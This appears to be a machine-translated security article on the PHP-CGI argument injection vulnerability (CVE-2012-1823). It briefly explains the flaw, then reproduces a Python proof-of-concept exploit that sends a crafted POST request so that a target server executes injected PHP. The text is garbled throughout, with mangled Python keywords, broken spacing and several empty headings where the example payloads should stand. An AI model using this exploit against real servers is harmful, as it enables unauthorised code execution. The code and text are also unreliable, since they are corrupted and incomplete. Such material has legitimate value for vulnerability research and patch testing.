The PHPCGI vulnerability was first published by a foreign security researcher recently. It actually exists for about eight years. According to website security engineer 360, the vulnerability is caused by the user submitting HTTP request parameters to the Apache server and handing over the parameters to the backend php-cgi through the mod_cgi module, however, some characters are not processed during execution, such as spaces, equal signs (=), minus signs (-), and so on. Using these characters, attackers can submit malicious data to the backend php-cgi parser. php-cgi will directly execute this "data" as a php parameter, currently, the intercepted attacks mainly use the following PHP parameters:
Contains the content read from the local file:
Read the PHP source code:
Directly execute any command:
Execute webshell directly on the server through remote inclusion:
Test code exposed by foreign hackers:
######################################## ######################################## ######
# Exploit Title: Cve-2012-1823 php cgi Argument Injection Exploit
# Date: May 4, 2012
# Author: rayh4c [0x40] 80sec [0x2e] com
# Exploit Discovered by wofeiwo [0x40] 80sec [0x2e] com
######################################## ######################################## ######
Importsocket
Importsys
Defcgi_exploit ():
Pwn_code = "" <? Php phpinfo ();?> """
Post_Length = len (pwn_code)
Http_raw = "" POST /? -Dallow_url_include % 3don +-dauto_prepend_file % 3 dphp: // input HTTP/1.1
Host: % s
Content-Type: application/x-www-form-urlencoded
Content-Length: % s
% S
"% (HOST, post_Length, pwn_code)
Printhttp_raw
Try:
Sock = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
Sock. connect (HOST, int (PORT )))
Sock. send (http_raw)
Data = sock. recv (10000)
Printrepr (data)
Sock. close ()
Effectsocket. error, msg:
Sys. stderr. write ("[ERROR] % s \ n" % msg [1])
Sys. exit (1)
If _ name _ = '_ main __':
Try:
HOST = sys. argv [1]
PORT = sys. argv [2]
Cgi_exploit ()
Tindexerror:
Print '[ +] Usage: cgi_test.py site.com 80'
Sys. exit (-1)